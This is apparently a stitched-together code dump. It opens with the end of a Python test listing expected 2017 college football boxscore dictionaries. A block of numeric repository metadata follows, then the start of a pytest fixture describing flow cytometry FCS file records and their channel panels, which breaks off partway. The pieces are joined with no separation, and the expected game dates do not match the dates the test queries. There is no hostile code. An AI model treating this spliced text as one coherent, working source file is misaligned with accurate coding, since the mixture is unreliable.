'winning_name': 'Vanderbilt',
'winning_abbr': 'vanderbilt',
'losing_name': 'Middle Tennessee State',
'losing_abbr': 'middle-tennessee-state'},
{'boxscore': '2017-09-02-mississippi',
'away_name': 'South Alabama',
'away_abbr': 'south-alabama',
'away_score': 27,
'away_rank': None,
'home_name': 'Ole Miss',
'home_abbr': 'mississippi',
'home_score': 47,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Ole Miss',
'winning_abbr': 'mississippi',
'losing_name': 'South Alabama',
'losing_abbr': 'south-alabama'},
{'boxscore': '2017-09-02-mississippi-state',
'away_name': 'Charleston Southern',
'away_abbr': 'Charleston Southern',
'away_score': 0,
'away_rank': None,
'home_name': 'Mississippi State',
'home_abbr': 'mississippi-state',
'home_score': 49,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': None,
'winning_abbr': None,
'losing_name': None,
'losing_abbr': None},
{'boxscore': '2017-09-02-missouri',
'away_name': 'Missouri State',
'away_abbr': 'Missouri State',
'away_score': 43,
'away_rank': None,
'home_name': 'Missouri',
'home_abbr': 'missouri',
'home_score': 72,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Missouri',
'winning_abbr': 'missouri',
'losing_name': 'Missouri State',
'losing_abbr': 'Missouri State'},
{'boxscore': '2017-09-02-nebraska',
'away_name': 'Arkansas State',
'away_abbr': 'arkansas-state',
'away_score': 36,
'away_rank': None,
'home_name': 'Nebraska',
'home_abbr': 'nebraska',
'home_score': 43,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Nebraska',
'winning_abbr': 'nebraska',
'losing_name': 'Arkansas State',
'losing_abbr': 'arkansas-state'},
{'boxscore': '2017-09-02-nevada-las-vegas',
'away_name': 'Howard',
'away_abbr': 'Howard',
'away_score': 43,
'away_rank': None,
'home_name': 'UNLV',
'home_abbr': 'nevada-las-vegas',
'home_score': 40,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Howard',
'winning_abbr': 'Howard',
'losing_name': 'UNLV',
'losing_abbr': 'nevada-las-vegas'},
{'boxscore': '2017-09-02-new-mexico',
'away_name': 'Abilene Christian',
'away_abbr': 'Abilene Christian',
'away_score': 14,
'away_rank': None,
'home_name': 'New Mexico',
'home_abbr': 'new-mexico',
'home_score': 38,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'New Mexico',
'winning_abbr': 'new-mexico',
'losing_name': 'Abilene Christian',
'losing_abbr': 'Abilene Christian'},
{'boxscore': '2017-09-02-north-carolina',
'away_name': 'California',
'away_abbr': 'california',
'away_score': 35,
'away_rank': None,
'home_name': 'North Carolina',
'home_abbr': 'north-carolina',
'home_score': 30,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'California',
'winning_abbr': 'california',
'losing_name': 'North Carolina',
'losing_abbr': 'north-carolina'},
{'boxscore': '2017-09-02-north-carolina-state',
'away_name': 'South Carolina',
'away_abbr': 'south-carolina',
'away_score': 35,
'away_rank': None,
'home_name': 'North Carolina State',
'home_abbr': 'north-carolina-state',
'home_score': 28,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'South Carolina',
'winning_abbr': 'south-carolina',
'losing_name': 'North Carolina State',
'losing_abbr': 'north-carolina-state'},
{'boxscore': '2017-09-02-north-texas',
'away_name': 'Lamar',
'away_abbr': 'Lamar',
'away_score': 14,
'away_rank': None,
'home_name': 'North Texas',
'home_abbr': 'north-texas',
'home_score': 59,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'North Texas',
'winning_abbr': 'north-texas',
'losing_name': 'Lamar',
'losing_abbr': 'Lamar'},
{'boxscore': '2017-09-02-northwestern',
'away_name': 'Nevada',
'away_abbr': 'nevada',
'away_score': 20,
'away_rank': None,
'home_name': 'Northwestern',
'home_abbr': 'northwestern',
'home_score': 31,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Northwestern',
'winning_abbr': 'northwestern',
'losing_name': 'Nevada',
'losing_abbr': 'nevada'},
{'boxscore': '2017-09-02-notre-dame',
'away_name': 'Temple',
'away_abbr': 'temple',
'away_score': 16,
'away_rank': None,
'home_name': 'Notre Dame',
'home_abbr': 'notre-dame',
'home_score': 49,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Notre Dame',
'winning_abbr': 'notre-dame',
'losing_name': 'Temple',
'losing_abbr': 'temple'},
{'boxscore': '2017-09-02-ohio',
'away_name': 'Hampton',
'away_abbr': 'Hampton',
'away_score': 0,
'away_rank': None,
'home_name': 'Ohio',
'home_abbr': 'ohio',
'home_score': 59,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': None,
'winning_abbr': None,
'losing_name': None,
'losing_abbr': None},
{'boxscore': '2017-09-02-oklahoma',
'away_name': 'UTEP',
'away_abbr': 'texas-el-paso',
'away_score': 7,
'away_rank': None,
'home_name': 'Oklahoma',
'home_abbr': 'oklahoma',
'home_score': 56,
'home_rank': 7,
'non_di': False,
'top_25': True,
'winning_name': 'Oklahoma',
'winning_abbr': 'oklahoma',
'losing_name': 'UTEP',
'losing_abbr': 'texas-el-paso'},
{'boxscore': '2017-09-02-old-dominion',
'away_name': 'Albany',
'away_abbr': 'Albany',
'away_score': 17,
'away_rank': None,
'home_name': 'Old Dominion',
'home_abbr': 'old-dominion',
'home_score': 31,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Old Dominion',
'winning_abbr': 'old-dominion',
'losing_name': 'Albany',
'losing_abbr': 'Albany'},
{'boxscore': '2017-09-02-oregon',
'away_name': 'Southern Utah',
'away_abbr': 'Southern Utah',
'away_score': 21,
'away_rank': None,
'home_name': 'Oregon',
'home_abbr': 'oregon',
'home_score': 77,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Oregon',
'winning_abbr': 'oregon',
'losing_name': 'Southern Utah',
'losing_abbr': 'Southern Utah'},
{'boxscore': '2017-09-02-oregon-state',
'away_name': 'Portland State',
'away_abbr': 'Portland State',
'away_score': 32,
'away_rank': None,
'home_name': 'Oregon State',
'home_abbr': 'oregon-state',
'home_score': 35,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Oregon State',
'winning_abbr': 'oregon-state',
'losing_name': 'Portland State',
'losing_abbr': 'Portland State'},
{'boxscore': '2017-09-02-penn-state',
'away_name': 'Akron',
'away_abbr': 'akron',
'away_score': 0,
'away_rank': None,
'home_name': 'Penn State',
'home_abbr': 'penn-state',
'home_score': 52,
'home_rank': 6,
'non_di': False,
'top_25': True,
'winning_name': None,
'winning_abbr': None,
'losing_name': None,
'losing_abbr': None},
{'boxscore': '2017-09-02-pittsburgh',
'away_name': 'Youngstown State',
'away_abbr': 'Youngstown State',
'away_score': 21,
'away_rank': None,
'home_name': 'Pitt',
'home_abbr': 'pittsburgh',
'home_score': 28,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Pitt',
'winning_abbr': 'pittsburgh',
'losing_name': 'Youngstown State',
'losing_abbr': 'Youngstown State'},
{'boxscore': '2017-09-02-purdue',
'away_name': 'Louisville',
'away_abbr': 'louisville',
'away_score': 35,
'away_rank': 16,
'home_name': 'Purdue',
'home_abbr': 'purdue',
'home_score': 28,
'home_rank': None,
'non_di': False,
'top_25': True,
'winning_name': 'Louisville',
'winning_abbr': 'louisville',
'losing_name': 'Purdue',
'losing_abbr': 'purdue'},
{'boxscore': '2017-09-02-san-diego-state',
'away_name': 'California-Davis',
'away_abbr': 'California-Davis',
'away_score': 17,
'away_rank': None,
'home_name': 'San Diego State',
'home_abbr': 'san-diego-state',
'home_score': 38,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'San Diego State',
'winning_abbr': 'san-diego-state',
'losing_name': 'California-Davis',
'losing_abbr': 'California-Davis'},
{'boxscore': '2017-09-02-san-jose-state',
'away_name': 'Cal Poly',
'away_abbr': 'Cal Poly',
'away_score': 13,
'away_rank': None,
'home_name': 'San Jose State',
'home_abbr': 'san-jose-state',
'home_score': 34,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'San Jose State',
'winning_abbr': 'san-jose-state',
'losing_name': 'Cal Poly',
'losing_abbr': 'Cal Poly'},
{'boxscore': '2017-09-02-south-florida',
'away_name': 'Stony Brook',
'away_abbr': 'Stony Brook',
'away_score': 17,
'away_rank': None,
'home_name': 'South Florida',
'home_abbr': 'south-florida',
'home_score': 31,
'home_rank': 19,
'non_di': True,
'top_25': True,
'winning_name': 'South Florida',
'winning_abbr': 'south-florida',
'losing_name': 'Stony Brook',
'losing_abbr': 'Stony Brook'},
{'boxscore': '2017-09-02-southern-california',
'away_name': 'Western Michigan',
'away_abbr': 'western-michigan',
'away_score': 31,
'away_rank': None,
'home_name': 'USC',
'home_abbr': 'southern-california',
'home_score': 49,
'home_rank': 4,
'non_di': False,
'top_25': True,
'winning_name': 'USC',
'winning_abbr': 'southern-california',
'losing_name': 'Western Michigan',
'losing_abbr': 'western-michigan'},
{'boxscore': '2017-09-02-southern-methodist',
'away_name': 'Stephen F. Austin',
'away_abbr': 'Stephen F. Austin',
'away_score': 14,
'away_rank': None,
'home_name': 'SMU',
'home_abbr': 'southern-methodist',
'home_score': 58,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'SMU',
'winning_abbr': 'southern-methodist',
'losing_name': 'Stephen F. Austin',
'losing_abbr': 'Stephen F. Austin'},
{'boxscore': '2017-09-02-southern-mississippi',
'away_name': 'Kentucky',
'away_abbr': 'kentucky',
'away_score': 24,
'away_rank': None,
'home_name': 'Southern Mississippi',
'home_abbr': 'southern-mississippi',
'home_score': 17,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Kentucky',
'winning_abbr': 'kentucky',
'losing_name': 'Southern Mississippi',
'losing_abbr': 'southern-mississippi'},
{'boxscore': '2017-09-02-texas',
'away_name': 'Maryland',
'away_abbr': 'maryland',
'away_score': 51,
'away_rank': None,
'home_name': 'Texas',
'home_abbr': 'texas',
'home_score': 41,
'home_rank': 23,
'non_di': False,
'top_25': True,
'winning_name': 'Maryland',
'winning_abbr': 'maryland',
'losing_name': 'Texas',
'losing_abbr': 'texas'},
{'boxscore': '2017-09-02-texas-christian',
'away_name': 'Jackson State',
'away_abbr': 'Jackson State',
'away_score': 0,
'away_rank': None,
'home_name': 'Texas Christian',
'home_abbr': 'texas-christian',
'home_score': 63,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': None,
'winning_abbr': None,
'losing_name': None,
'losing_abbr': None},
{'boxscore': '2017-09-02-texas-state',
'away_name': '',
'away_abbr': '',
'away_score': 11,
'away_rank': None,
'home_name': 'Texas State',
'home_abbr': 'texas-state',
'home_score': 20,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Texas State',
'winning_abbr': 'texas-state',
'losing_name': '',
'losing_abbr': ''},
{'boxscore': '2017-09-02-texas-tech',
'away_name': 'Eastern Washington',
'away_abbr': 'Eastern Washington',
'away_score': 10,
'away_rank': None,
'home_name': 'Texas Tech',
'home_abbr': 'texas-tech',
'home_score': 56,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Texas Tech',
'winning_abbr': 'texas-tech',
'losing_name': 'Eastern Washington',
'losing_abbr': 'Eastern Washington'},
{'boxscore': '2017-09-02-tulane',
'away_name': 'Grambling State',
'away_abbr': 'Grambling State',
'away_score': 14,
'away_rank': None,
'home_name': 'Tulane',
'home_abbr': 'tulane',
'home_score': 43,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Tulane',
'winning_abbr': 'tulane',
'losing_name': 'Grambling State',
'losing_abbr': 'Grambling State'},
{'boxscore': '2017-09-02-virginia',
'away_name': 'William & Mary',
'away_abbr': 'William & Mary',
'away_score': 10,
'away_rank': None,
'home_name': 'Virginia',
'home_abbr': 'virginia',
'home_score': 28,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Virginia',
'winning_abbr': 'virginia',
'losing_name': 'William & Mary',
'losing_abbr': 'William & Mary'},
{'boxscore': '2017-09-02-washington-state',
'away_name': 'Montana State',
'away_abbr': 'Montana State',
'away_score': 0,
'away_rank': None,
'home_name': 'Washington State',
'home_abbr': 'washington-state',
'home_score': 31,
'home_rank': 24,
'non_di': True,
'top_25': True,
'winning_name': None,
'winning_abbr': None,
'losing_name': None,
'losing_abbr': None},
{'boxscore': '2017-09-02-western-kentucky',
'away_name': 'Eastern Kentucky',
'away_abbr': 'Eastern Kentucky',
'away_score': 17,
'away_rank': None,
'home_name': 'Western Kentucky',
'home_abbr': 'western-kentucky',
'home_score': 31,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Western Kentucky',
'winning_abbr': 'western-kentucky',
'losing_name': 'Eastern Kentucky',
'losing_abbr': 'Eastern Kentucky'},
{'boxscore': '2017-09-01-army',
'away_name': 'Fordham',
'away_abbr': 'Fordham',
'away_score': 6,
'away_rank': None,
'home_name': 'Army',
'home_abbr': 'army',
'home_score': 64,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Army',
'winning_abbr': 'army',
'losing_name': 'Fordham',
'losing_abbr': 'Fordham'},
{'boxscore': '2017-09-01-colorado',
'away_name': 'Colorado State',
'away_abbr': 'colorado-state',
'away_score': 3,
'away_rank': None,
'home_name': 'Colorado',
'home_abbr': 'colorado',
'home_score': 17,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Colorado',
'winning_abbr': 'colorado',
'losing_name': 'Colorado State',
'losing_abbr': 'colorado-state'},
{'boxscore': '2017-09-01-eastern-michigan',
'away_name': 'Charlotte',
'away_abbr': 'charlotte',
'away_score': 7,
'away_rank': None,
'home_name': 'Eastern Michigan',
'home_abbr': 'eastern-michigan',
'home_score': 24,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Eastern Michigan',
'winning_abbr': 'eastern-michigan',
'losing_name': 'Charlotte',
'losing_abbr': 'charlotte'},
{'boxscore': '2017-09-01-florida-atlantic',
'away_name': 'Navy',
'away_abbr': 'navy',
'away_score': 42,
'away_rank': None,
'home_name': 'Florida Atlantic',
'home_abbr': 'florida-atlantic',
'home_score': 19,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Navy',
'winning_abbr': 'navy',
'losing_name': 'Florida Atlantic',
'losing_abbr': 'florida-atlantic'},
{'boxscore': '2017-09-01-northern-illinois',
'away_name': 'Boston College',
'away_abbr': 'boston-college',
'away_score': 23,
'away_rank': None,
'home_name': 'Northern Illinois',
'home_abbr': 'northern-illinois',
'home_score': 20,
'home_rank': None,
'non_di': False,
'top_25': False,
'winning_name': 'Boston College',
'winning_abbr': 'boston-college',
'losing_name': 'Northern Illinois',
'losing_abbr': 'northern-illinois'},
{'boxscore': '2017-09-01-rutgers',
'away_name': 'Washington',
'away_abbr': 'washington',
'away_score': 30,
'away_rank': 8,
'home_name': 'Rutgers',
'home_abbr': 'rutgers',
'home_score': 14,
'home_rank': None,
'non_di': False,
'top_25': True,
'winning_name': 'Washington',
'winning_abbr': 'washington',
'losing_name': 'Rutgers',
'losing_abbr': 'rutgers'},
{'boxscore': '2017-09-01-syracuse',
'away_name': 'Central Connecticut State',
'away_abbr': 'Central Connecticut State',
'away_score': 7,
'away_rank': None,
'home_name': 'Syracuse',
'home_abbr': 'syracuse',
'home_score': 50,
'home_rank': None,
'non_di': True,
'top_25': False,
'winning_name': 'Syracuse',
'winning_abbr': 'syracuse',
'losing_name': 'Central Connecticut State',
'losing_abbr': 'Central Connecticut State'},
{'boxscore': '2017-09-01-wisconsin',
'away_name': 'Utah State',
'away_abbr': 'utah-state',
'away_score': 10,
'away_rank': None,
'home_name': 'Wisconsin',
'home_abbr': 'wisconsin',
'home_score': 59,
'home_rank': 9,
'non_di': False,
'top_25': True,
'winning_name': 'Wisconsin',
'winning_abbr': 'wisconsin',
'losing_name': 'Utah State',
'losing_abbr': 'utah-state'}
]
}
result = Boxscores(datetime(2017, 8, 30), datetime(2017, 8, 31)).games
assert result == expected
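# Illustrative sketch (an assumption, not part of the original test file): the
# ``games`` property maps each queried date string to a list of game dicts
# shaped like the entries above, so a consumer could walk the result as:
#
#     for date, matchups in result.items():
#         for game in matchups:
#             print(game['boxscore'], game['winning_name'], game['losing_name'])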
| 41.759475
| 78
| 0.417889
| 14,189
| 168,583
| 4.70019
| 0.029812
| 0.053261
| 0.042105
| 0.05614
| 0.950668
| 0.949708
| 0.948269
| 0.944385
| 0.940967
| 0.938148
| 0
| 0.041212
| 0.448734
| 168,583
| 4,036
| 79
| 41.769822
| 0.676405
| 0.002135
| 0
| 0.956239
| 0
| 0
| 0.384321
| 0.024587
| 0
| 0
| 0
| 0
| 0.002501
| 1
| 0.003251
| false
| 0.002001
| 0.002251
| 0
| 0.007502
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7
| 0a4eb8710f2a84eb8f0f17b69c1f616fe32993c9
| 30,669
| py
| Python
| tests/fixtures/api-fcsfiles.py
| primitybio/cellengine-python-toolkit
| 1f9dd168f1f27e2beba69f02e340371190857b33
| ["MIT"] | 4
| 2021-01-12T17:03:37.000Z
| 2021-12-16T13:23:57.000Z
| tests/fixtures/api-fcsfiles.py
| primitybio/cellengine-python-toolkit
| 1f9dd168f1f27e2beba69f02e340371190857b33
| ["MIT"] | 61
| 2021-01-11T05:27:16.000Z
| 2022-03-08T01:50:09.000Z
| tests/fixtures/api-fcsfiles.py
| primitybio/cellengine-python-toolkit
| 1f9dd168f1f27e2beba69f02e340371190857b33
| ["MIT"] | null | null | null |
import pytest
@pytest.fixture(scope="session")
def fcs_files():
fcs_files = [
{
"_id": "5d64abe2ca9df61349ed8e79",
"annotations": [
{"name": "plate", "value": "96 Well - V bottom"},
{"name": "plate row", "value": "A"},
{"name": "plate column", "value": "12"},
{"name": "plate well", "value": "A12"},
],
"crc32c": "11dc920c",
"deleted": False,
"eventCount": 898,
"experimentId": "5d38a6f79fae87499999a74b",
"filename": "Specimen_001_A12_A12.fcs",
"hasFileInternalComp": True,
"md5": "78df4458fa00a0a2621ce51331fb5fbc",
"isControl": False,
"panel": [
{"channel": "FSC-A", "index": 1, "reagent": None},
{"channel": "FSC-H", "index": 2, "reagent": None},
{"channel": "FSC-W", "index": 3, "reagent": None},
{"channel": "SSC-A", "index": 4, "reagent": None},
{"channel": "SSC-H", "index": 5, "reagent": None},
{"channel": "SSC-W", "index": 6, "reagent": None},
{"channel": "Blue530-A", "index": 7, "reagent": None},
{"channel": "Blue695-A", "index": 8, "reagent": None},
{"channel": "Vio450-A", "index": 9, "reagent": None},
{"channel": "Vio525-A", "index": 10, "reagent": None},
{"channel": "Vio585-A", "index": 11, "reagent": None},
{"channel": "Vio605-A", "index": 12, "reagent": None},
{"channel": "Vio655-A", "index": 13, "reagent": None},
{"channel": "Vio710-A", "index": 14, "reagent": None},
{"channel": "UV450-A", "index": 15, "reagent": None},
{"channel": "UV530-A", "index": 16, "reagent": None},
{"channel": "Red670-A", "index": 17, "reagent": None},
{"channel": "Red730-A", "index": 18, "reagent": None},
{"channel": "Red780-A", "index": 19, "reagent": None},
{"channel": "YG582-A", "index": 20, "reagent": None},
{"channel": "YG610-A", "index": 21, "reagent": None},
{"channel": "YG670-A", "index": 22, "reagent": None},
{"channel": "YG710-A", "index": 23, "reagent": None},
{"channel": "YG780-A", "index": 24, "reagent": None},
{"channel": "Time", "index": 25, "reagent": None},
],
"panelName": "Panel 1",
"sampleName": " ",
"size": 94438,
},
{
"_id": "5d64abe2ca9df61349ed8e7a",
"annotations": [
{"name": "plate", "value": "96 Well - V bottom"},
{"name": "plate row", "value": "A"},
{"name": "plate column", "value": "02"},
{"name": "plate well", "value": "A02"},
],
"crc32c": "11dc920c",
"deleted": False,
"eventCount": 1025,
"experimentId": "5d38a6f79fae87499999a74b",
"filename": "Specimen_001_A2_A02.fcs",
"hasFileInternalComp": True,
"md5": "4a0ddcc46265709d2bc0786ccc52e9a0",
"isControl": False,
"panel": [
{"channel": "FSC-A", "index": 1, "reagent": None},
{"channel": "FSC-H", "index": 2, "reagent": None},
{"channel": "FSC-W", "index": 3, "reagent": None},
{"channel": "SSC-A", "index": 4, "reagent": None},
{"channel": "SSC-H", "index": 5, "reagent": None},
{"channel": "SSC-W", "index": 6, "reagent": None},
{"channel": "Blue530-A", "index": 7, "reagent": None},
{"channel": "Blue695-A", "index": 8, "reagent": None},
{"channel": "Vio450-A", "index": 9, "reagent": None},
{"channel": "Vio525-A", "index": 10, "reagent": None},
{"channel": "Vio585-A", "index": 11, "reagent": None},
{"channel": "Vio605-A", "index": 12, "reagent": None},
{"channel": "Vio655-A", "index": 13, "reagent": None},
{"channel": "Vio710-A", "index": 14, "reagent": None},
{"channel": "UV450-A", "index": 15, "reagent": None},
{"channel": "UV530-A", "index": 16, "reagent": None},
{"channel": "Red670-A", "index": 17, "reagent": None},
{"channel": "Red730-A", "index": 18, "reagent": None},
{"channel": "Red780-A", "index": 19, "reagent": None},
{"channel": "YG582-A", "index": 20, "reagent": None},
{"channel": "YG610-A", "index": 21, "reagent": None},
{"channel": "YG670-A", "index": 22, "reagent": None},
{"channel": "YG710-A", "index": 23, "reagent": None},
{"channel": "YG780-A", "index": 24, "reagent": None},
{"channel": "Time", "index": 25, "reagent": None},
],
"panelName": "Panel 1",
"sampleName": " ",
"size": 107131,
},
{
"_id": "5d64abe2ca9df61349ed8e7b",
"annotations": [
{"name": "plate", "value": "96 Well - V bottom"},
{"name": "plate row", "value": "A"},
{"name": "plate column", "value": "05"},
{"name": "plate well", "value": "A05"},
],
"crc32c": "11dc920c",
"deleted": False,
"eventCount": 1490,
"experimentId": "5d38a6f79fae87499999a74b",
"filename": "Specimen_001_A5_A05.fcs",
"hasFileInternalComp": True,
"md5": "754cd2970e059ad7f391b007588feb90",
"isControl": False,
"panel": [
{"channel": "FSC-A", "index": 1, "reagent": None},
{"channel": "FSC-H", "index": 2, "reagent": None},
{"channel": "FSC-W", "index": 3, "reagent": None},
{"channel": "SSC-A", "index": 4, "reagent": None},
{"channel": "SSC-H", "index": 5, "reagent": None},
{"channel": "SSC-W", "index": 6, "reagent": None},
{"channel": "Blue530-A", "index": 7, "reagent": None},
{"channel": "Blue695-A", "index": 8, "reagent": None},
{"channel": "Vio450-A", "index": 9, "reagent": None},
{"channel": "Vio525-A", "index": 10, "reagent": None},
{"channel": "Vio585-A", "index": 11, "reagent": None},
{"channel": "Vio605-A", "index": 12, "reagent": None},
{"channel": "Vio655-A", "index": 13, "reagent": None},
{"channel": "Vio710-A", "index": 14, "reagent": None},
{"channel": "UV450-A", "index": 15, "reagent": None},
{"channel": "UV530-A", "index": 16, "reagent": None},
{"channel": "Red670-A", "index": 17, "reagent": None},
{"channel": "Red730-A", "index": 18, "reagent": None},
{"channel": "Red780-A", "index": 19, "reagent": None},
{"channel": "YG582-A", "index": 20, "reagent": None},
{"channel": "YG610-A", "index": 21, "reagent": None},
{"channel": "YG670-A", "index": 22, "reagent": None},
{"channel": "YG710-A", "index": 23, "reagent": None},
{"channel": "YG780-A", "index": 24, "reagent": None},
{"channel": "Time", "index": 25, "reagent": None},
],
"panelName": "Panel 1",
"sampleName": " ",
"size": 153630,
},
{
"_id": "5d64abe2ca9df61349ed8e7c",
"annotations": [
{"name": "plate", "value": "96 Well - V bottom"},
{"name": "plate row", "value": "A"},
{"name": "plate column", "value": "01"},
{"name": "plate well", "value": "A01"},
],
"crc32c": "11dc920c",
"deleted": False,
"eventCount": 415,
"experimentId": "5d38a6f79fae87499999a74b",
"filename": "Specimen_001_A1_A01.fcs",
"hasFileInternalComp": True,
"md5": "44b7add508fdfa816c57f8fc9d61f759",
"isControl": False,
"panel": [
{"channel": "FSC-A", "index": 1, "reagent": None},
{"channel": "FSC-H", "index": 2, "reagent": None},
{"channel": "FSC-W", "index": 3, "reagent": None},
{"channel": "SSC-A", "index": 4, "reagent": None},
{"channel": "SSC-H", "index": 5, "reagent": None},
{"channel": "SSC-W", "index": 6, "reagent": None},
{"channel": "Blue530-A", "index": 7, "reagent": None},
{"channel": "Blue695-A", "index": 8, "reagent": None},
{"channel": "Vio450-A", "index": 9, "reagent": None},
{"channel": "Vio525-A", "index": 10, "reagent": None},
{"channel": "Vio585-A", "index": 11, "reagent": None},
{"channel": "Vio605-A", "index": 12, "reagent": None},
{"channel": "Vio655-A", "index": 13, "reagent": None},
{"channel": "Vio710-A", "index": 14, "reagent": None},
{"channel": "UV450-A", "index": 15, "reagent": None},
{"channel": "UV530-A", "index": 16, "reagent": None},
{"channel": "Red670-A", "index": 17, "reagent": None},
{"channel": "Red730-A", "index": 18, "reagent": None},
{"channel": "Red780-A", "index": 19, "reagent": None},
{"channel": "YG582-A", "index": 20, "reagent": None},
{"channel": "YG610-A", "index": 21, "reagent": None},
{"channel": "YG670-A", "index": 22, "reagent": None},
{"channel": "YG710-A", "index": 23, "reagent": None},
{"channel": "YG780-A", "index": 24, "reagent": None},
{"channel": "Time", "index": 25, "reagent": None},
],
"panelName": "Panel 1",
"sampleName": " ",
"size": 46131,
},
{
"_id": "5d64abe2ca9df61349ed8e7d",
"annotations": [
{"name": "plate", "value": "96 Well - V bottom"},
{"name": "plate row", "value": "A"},
{"name": "plate column", "value": "03"},
{"name": "plate well", "value": "A03"},
],
"crc32c": "11dc920c",
"deleted": False,
"eventCount": 993,
"experimentId": "5d38a6f79fae87499999a74b",
"filename": "Specimen_001_A3_A03.fcs",
"hasFileInternalComp": True,
"md5": "7e139fa7cb350deb6f1f180a6290b87f",
"isControl": False,
"panel": [
{"channel": "FSC-A", "index": 1, "reagent": None},
{"channel": "FSC-H", "index": 2, "reagent": None},
{"channel": "FSC-W", "index": 3, "reagent": None},
{"channel": "SSC-A", "index": 4, "reagent": None},
{"channel": "SSC-H", "index": 5, "reagent": None},
{"channel": "SSC-W", "index": 6, "reagent": None},
{"channel": "Blue530-A", "index": 7, "reagent": None},
{"channel": "Blue695-A", "index": 8, "reagent": None},
{"channel": "Vio450-A", "index": 9, "reagent": None},
{"channel": "Vio525-A", "index": 10, "reagent": None},
{"channel": "Vio585-A", "index": 11, "reagent": None},
{"channel": "Vio605-A", "index": 12, "reagent": None},
{"channel": "Vio655-A", "index": 13, "reagent": None},
{"channel": "Vio710-A", "index": 14, "reagent": None},
{"channel": "UV450-A", "index": 15, "reagent": None},
{"channel": "UV530-A", "index": 16, "reagent": None},
{"channel": "Red670-A", "index": 17, "reagent": None},
{"channel": "Red730-A", "index": 18, "reagent": None},
{"channel": "Red780-A", "index": 19, "reagent": None},
{"channel": "YG582-A", "index": 20, "reagent": None},
{"channel": "YG610-A", "index": 21, "reagent": None},
{"channel": "YG670-A", "index": 22, "reagent": None},
{"channel": "YG710-A", "index": 23, "reagent": None},
{"channel": "YG780-A", "index": 24, "reagent": None},
{"channel": "Time", "index": 25, "reagent": None},
],
"panelName": "Panel 1",
"sampleName": " ",
"size": 103931,
},
{
"_id": "5d64abe2ca9df61349ed8e7e",
"annotations": [
{"name": "plate", "value": "96 Well - V bottom"},
{"name": "plate row", "value": "A"},
{"name": "plate column", "value": "04"},
{"name": "plate well", "value": "A04"},
],
"crc32c": "11dc920c",
"deleted": False,
"eventCount": 936,
"experimentId": "5d38a6f79fae87499999a74b",
"filename": "Specimen_001_A4_A04.fcs",
"hasFileInternalComp": True,
"md5": "4e02338052ec43d6ab4cf5ebb98064aa",
"isControl": False,
"panel": [
{"channel": "FSC-A", "index": 1, "reagent": None},
{"channel": "FSC-H", "index": 2, "reagent": None},
{"channel": "FSC-W", "index": 3, "reagent": None},
{"channel": "SSC-A", "index": 4, "reagent": None},
{"channel": "SSC-H", "index": 5, "reagent": None},
{"channel": "SSC-W", "index": 6, "reagent": None},
{"channel": "Blue530-A", "index": 7, "reagent": None},
{"channel": "Blue695-A", "index": 8, "reagent": None},
{"channel": "Vio450-A", "index": 9, "reagent": None},
{"channel": "Vio525-A", "index": 10, "reagent": None},
{"channel": "Vio585-A", "index": 11, "reagent": None},
{"channel": "Vio605-A", "index": 12, "reagent": None},
{"channel": "Vio655-A", "index": 13, "reagent": None},
{"channel": "Vio710-A", "index": 14, "reagent": None},
{"channel": "UV450-A", "index": 15, "reagent": None},
{"channel": "UV530-A", "index": 16, "reagent": None},
{"channel": "Red670-A", "index": 17, "reagent": None},
{"channel": "Red730-A", "index": 18, "reagent": None},
{"channel": "Red780-A", "index": 19, "reagent": None},
{"channel": "YG582-A", "index": 20, "reagent": None},
{"channel": "YG610-A", "index": 21, "reagent": None},
{"channel": "YG670-A", "index": 22, "reagent": None},
{"channel": "YG710-A", "index": 23, "reagent": None},
{"channel": "YG780-A", "index": 24, "reagent": None},
{"channel": "Time", "index": 25, "reagent": None},
],
"panelName": "Panel 1",
"sampleName": " ",
"size": 98230,
},
{
"_id": "5d64abe2ca9df61349ed8e7f",
"annotations": [
{"name": "plate", "value": "96 Well - V bottom"},
{"name": "plate row", "value": "A"},
{"name": "plate column", "value": "06"},
{"name": "plate well", "value": "A06"},
],
"crc32c": "11dc920c",
"deleted": False,
"eventCount": 180,
"experimentId": "5d38a6f79fae87499999a74b",
"filename": "Specimen_001_A6_A06.fcs",
"hasFileInternalComp": True,
"md5": "da0791509dd29ebca1c5d6d649d11b73",
"isControl": False,
"panel": [
{"channel": "FSC-A", "index": 1, "reagent": None},
{"channel": "FSC-H", "index": 2, "reagent": None},
{"channel": "FSC-W", "index": 3, "reagent": None},
